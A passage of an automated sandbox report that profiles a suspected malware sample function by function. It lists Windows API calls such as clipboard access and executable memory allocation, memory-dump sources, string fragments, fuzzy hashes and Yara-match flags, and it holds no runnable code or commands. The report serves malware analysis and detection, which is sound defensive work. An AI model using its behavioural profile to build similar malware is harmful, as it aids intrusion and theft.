                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                              • Instruction ID: 50cfc2c49a3083e08c64fd866987bc454676edab02516c1ee8da21e686402dde
                                                              • Opcode Fuzzy Hash: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                              • Instruction Fuzzy Hash: 4821D2B4501A02AFE715DF25D8D1A2ABBB2FB86305F10C23EC85647B15DB38A455CFD8
                                                              Function 0043724D Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                              • Instruction ID: d108b6c160ddb040137915c382c094585e6d719fb6ca8c5299172bcdf25914e1
                                                              • Opcode Fuzzy Hash: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                              • Instruction Fuzzy Hash: 131113751083409FD700CF04D49470BB7A2EFC5318F65CA5CE8A81B25AC379A90ACB9A
                                                              Function 004372F8 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0043738D
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 8b4b31e72015f58f2354e1bb9d9c3a9735f796f91b91e2fab4406d122cedec8b
                                                              • Instruction ID: ee8488e267e88be69cd1f03818601e052f7114df8572ecc488c32b2c78a41869
                                                              • Opcode Fuzzy Hash: 8b4b31e72015f58f2354e1bb9d9c3a9735f796f91b91e2fab4406d122cedec8b
                                                              • Instruction Fuzzy Hash: 6F11E87010C3409FD718CF14D46476FBBE1EFC5718F148A1DE8AA1B692C379991ACB8A
                                                              Function 00435440 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                              • Instruction ID: 3dda7e75f36cf504926de81a89fda72ed932754256e5c243a5fe3c5ff6ff8171
                                                              • Opcode Fuzzy Hash: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                              • Instruction Fuzzy Hash: 731125705083009FD708CF10C46476BBBA1EB85328F108A1DE8A917681C379DA09CBC6
                                                              Function 004373E0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                              • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                              • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                              • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                              Function 0079DE95 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0079DEE6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_79d000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 0c85a0514664dacc25a8c597dcb693a82736441797b39321c7903a772ed168c7
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: AC113C79A00208FFDB01DF98C989E98BBF5AF08350F058094F9489B362D375EA50DF80

                                                              Non-executed Functions

                                                              Function 0042EAB0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                              • String ID: @$A$C$F
                                                              • API String ID: 3829817484-319984173
                                                              • Opcode ID: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                              • Instruction ID: 15be754739b74540689589334df2f87df7105b9426ed1557cb94c4d1065241c1
                                                              • Opcode Fuzzy Hash: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                              • Instruction Fuzzy Hash: 9B513D7060C391CFD300DF6AA48875FBFE0AB96364F940A6EF4D58A291C738954A8B57
                                                              Function 004016E0 Relevance: 15.5, Strings: 12, Instructions: 492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                              • API String ID: 0-879020378
                                                              • Opcode ID: b6e0a92ae582881cf6e2ff09ca5e905cd5929e3ea3787b5d42416239a9d202b1
                                                              • Instruction ID: bd7178ecccf1f1e773a4192e4ca540b31a3e3f12fd5816677c43404a507449fe
                                                              • Opcode Fuzzy Hash: b6e0a92ae582881cf6e2ff09ca5e905cd5929e3ea3787b5d42416239a9d202b1
                                                              • Instruction Fuzzy Hash: B9F104B0A003059FE7105F65D885727BBE4AF54308F14853EE886A73E2EB3DE914CB5A
                                                              Function 021372C9 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                              • API String ID: 0-4068174152
                                                              • Opcode ID: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                              • Instruction ID: 0ab2436ae8d7cde4eccd6da34b11bf9bcdf94b05d6223e3488ab7373fdb0aca9
                                                              • Opcode Fuzzy Hash: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                              • Instruction Fuzzy Hash: 0BC178B1640B018BD729CF14C4A1B22F7B2FF56318F198A5CC8A64BB91E775F852CB90
                                                              Function 00417062 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                              • API String ID: 0-4068174152
                                                              • Opcode ID: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                              • Instruction ID: c5e2fc403fb0cec226c3ddd8a9dc625652c1aa2ba632ddc363c6cf4a8812eb13
                                                              • Opcode Fuzzy Hash: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                              • Instruction Fuzzy Hash: CBC1AAB1104B018BD328CF14C5A1B63B7B2FF56318F28865DC8A64BB91E779F891CB94
                                                              Function 004223B8 Relevance: 9.3, Strings: 7, Instructions: 552COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                              • API String ID: 1279760036-2560538612
                                                              • Opcode ID: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                              • Instruction ID: ae90b01d8c300a32a6ec655623065aa85ae112dbe4b9f4c81515b6d4964649e2
                                                              • Opcode Fuzzy Hash: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                              • Instruction Fuzzy Hash: 851266316083909FD324CF28D85076ABBE2AFC6324F59866EE4958B3E1C779CD45CB46
                                                              Function 02129BC7 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$01$ZR\;$[hct${hmn
                                                              • API String ID: 0-1484469362
                                                              • Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                              • Instruction ID: 529861c0716fe19863e499ceae189eb091099b04bbaf443b517289e78a7a57e6
                                                              • Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                              • Instruction Fuzzy Hash: 7E1202B02083818BE324CF58C4A4B6FBBE5BB86348F144D1CE5E58B291D77AD419CB92
                                                              Function 02143EFE Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02143FF4
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0214401D
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 02144434
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 02144462
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                              • Instruction ID: cca6cc22778078e7f9dd0b3bc163f7ac1c82f9549c6120f132e177b8ba2d0ad7
                                                              • Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                              • Instruction Fuzzy Hash: 0D3246B4500B009FD728CF29C495B17BBB2FB85314F158A5CE8A64BB99D774E80ACBD1
                                                              Function 00423C97 Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                              • Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
                                                              • Opcode Fuzzy Hash: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                              • Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1
                                                              Function 02143ECF Relevance: 6.6, APIs: 4, Instructions: 614COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02143FF4
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0214401D
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                              • Instruction ID: a24102de4b35eb4522df37065739374ea636957204b955ab014f31d20b0013da
                                                              • Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                              • Instruction Fuzzy Hash: 9C3245B4500B019FD728CF29C494B17BBB2BF85314F158A5CD8AA4BB99D774E80ACBD1
                                                              Function 00421C71 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: /V.W$2 B$J>;0$gdeb
                                                              • API String ID: 1279760036-1943473526
                                                              • Opcode ID: eb1d6880a56a5992fead70266ebc35c96466e4d3bb0734c4ddebee2a94e5caae
                                                              • Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
                                                              • Opcode Fuzzy Hash: eb1d6880a56a5992fead70266ebc35c96466e4d3bb0734c4ddebee2a94e5caae
                                                              • Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86
                                                              Function 02141C89 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #M*O$.A+C$<Y9[$de
                                                              • API String ID: 0-619215113
                                                              • Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                              • Instruction ID: 580bd4013385b26f177361563e41567742c205b285c4bed5281630de06e45ec6
                                                              • Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                              • Instruction Fuzzy Hash: FA4189B46483958BC328CF04C0907ABB7F1FF86314F915A1CE8DA5B790DBB59846CB86
                                                              Function 021475BA Relevance: 4.9, Strings: 3, Instructions: 1198COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2PBb$Yceh$]hW9
                                                              • API String ID: 0-1551782443
                                                              • Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                              • Instruction ID: 514f76bfff57c2ad55ef6650a00a8fbeb55136913e92a8c849dc966121d3666f
                                                              • Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                              • Instruction Fuzzy Hash: 7C924B70144B808EE7268F35C4A47E3BBE1BF16309F48499DD5EF8B282DB79610ACB51
                                                              Function 02145F55 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$7452$JlRp
                                                              • API String ID: 0-3284767125
                                                              • Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                              • Instruction ID: 2bf2174bfb8aa8be00586c2a2f454ad86fd7b9a24956909892c521b900fd6fd1
                                                              • Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                              • Instruction Fuzzy Hash: F5529E70244B818FE339CF29C4A07A6BBE6BF56308F54895DC4EB8B785CB75A409CB51
                                                              Function 00425CEE Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: 7452$7452$JlRp
                                                              • API String ID: 2994545307-3284767125
                                                              • Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                              • Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
                                                              • Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                              • Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59
                                                              Function 0215B2B7 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"$R-,T$R-,T
                                                              • API String ID: 0-1082949730
                                                              • Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                              • Instruction ID: 91f5837c4f96479d609c5eb808463228a3f759c63849d30c845159d8e2f6a9a8
                                                              • Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                              • Instruction Fuzzy Hash: 77B1AD75A08321CBC724CF18C490A6BB7E2FF88758F18865CE8A95B365D734DD11CB91
                                                              Function 0043B050 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"$R-,T$R-,T
                                                              • API String ID: 0-1082949730
                                                              • Opcode ID: 7a4f43ee0880b98fbdcda669b16d56030fa70b8b446607e2e012461912b396b9
                                                              • Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
                                                              • Opcode Fuzzy Hash: 7a4f43ee0880b98fbdcda669b16d56030fa70b8b446607e2e012461912b396b9
                                                              • Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A
                                                              Function 021256A7 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$8
                                                              • API String ID: 0-46163386
                                                              • Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                              • Instruction ID: a6ab4bbeba9c49c707536051111afc28ad7ef00f64fe91665653d2bbfc14cd96
                                                              • Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                              • Instruction Fuzzy Hash: 16826971608351AFD724CF18C88075ABBE2BF88318F48892DF99987391D375D968CF92
                                                              Function 00405440 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$8
                                                              • API String ID: 0-46163386
                                                              • Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                              • Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
                                                              • Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                              • Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96
                                                              Function 021463DB Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction ID: df22bc4e3510e27ca2f3f1fe3302ea763bb81e2c43c646472f5aab86a75570e1
                                                              • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction Fuzzy Hash: DDF16070644B818FD3398F25C0647A3BBE1BF56308F54896DC5EF8B685CB79A009CB51
                                                              Function 00426174 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                              • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                              Function 021464EB Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                              • Instruction ID: 6dde2407734d44b6b340366c27aa181bd6e2e71507cf76f10d97dd8eef7acb7a
